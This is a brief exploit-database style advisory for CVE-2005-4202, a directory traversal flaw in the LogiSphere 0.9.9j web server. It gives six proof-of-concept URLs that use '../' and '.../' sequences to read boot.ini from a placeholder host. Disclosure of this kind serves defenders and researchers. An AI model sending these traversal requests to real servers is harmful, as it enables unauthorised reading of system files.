LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access

Related Vulnerabilities: CVE-2005-4202  
Publish Date: 12 Dec 2005
Author: dr_insane
                source: http://www.securityfocus.com/bid/15807/info
  
LogiSphere is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
  
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible. 

http://www.example.com:8080/.../.../.../.../.../.../.../boot.ini
http://www.example.com:8080/../../../../../../../../../boot.ini
http://www.example.com:8080/../../../boot.ini
http://www.example.com:8080/..//..//..//..//..//..//..//boot.ini
http://www.example.com:8080/boot.ini
http://www.example.com:8080/boot.ini